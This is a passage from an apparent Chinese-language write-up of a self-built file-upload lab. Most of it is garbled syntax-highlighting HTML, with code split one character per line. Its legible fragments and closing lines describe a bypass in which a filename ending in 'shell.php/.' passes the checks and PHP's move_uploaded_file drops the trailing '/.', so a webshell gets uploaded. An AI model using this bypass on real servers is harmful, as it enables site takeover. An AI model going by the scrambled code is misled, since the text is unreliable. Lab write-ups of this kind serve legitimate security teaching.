        file</span><spanclass="tokenpunctuation">[</span><spanclass="tokennumber">2</span><spanclass="tokenoperator"></span><spanclass="tokennumber">1</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">;</span><spanclass="tokenoperator">=</span><spanclass="tokenstringsinglequotedstring">shell.php/</span><spanclass="tokenoperator">.</span><spanclass="tokenstringsinglequotedstring"></span><spanclass="tokenoperator">=</span><spanclass="tokenstringsinglequotedstring">shell.php/.</span><spanariahidden="true"class="linenumbersrows"><span></span><span></span></span></code></pre></div><p></p><divclass="codearea"style="position:relative"><iclass="fasfaangleupcodeexpand"ariahidden="true"></i><divclass="codecopynotice"></div><iclass="fasfacopycodecopy"title=""ariahidden="true"></i><divclass="codelang"title="">php</div><preclass="linenumberslanguagephp"datalanguage="php"><codeclass="languagephp"><spanclass="tokenfunction">moveuploadedfile</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">temp_file, 
        
         
          
           
            i
           
           
            m
           
           
            
             g
            
            
             p
            
           
           
            a
           
           
            t
           
           
            h
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            )
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            f
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            m
           
           
            o
           
           
            v
           
           
            
             e
            
            
             u
            
           
           
            p
           
           
            l
           
           
            o
           
           
            a
           
           
            d
           
           
            e
           
           
            
             d
            
            
             f
            
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            (
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           img_path</span><span class="token punctuation">)</span> <span class="token function">move_uploaded_file</span><span class="token punctuation">(</span><span class="token variable">
          
         
        imgpath</span><spanclass="tokenpunctuation">)</span><spanclass="tokenfunction">moveuploadedfile</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">temp_file, ‘xx/xx/shell/php/.’)  

结合前面的 move_uploaded_file 函数缺陷,会忽略掉文件末尾的 /.,所以最终就可以成功将 webshell 上传。

那么最终构造的数据包如下:

支持一下

目前文件上传的靶场一共 13 个关卡,自己从靶场开发到编写 WP 也耗时了好几天时间,不过每次总结整理这些的熟悉又陌生的知识点感觉都会有新的发现 :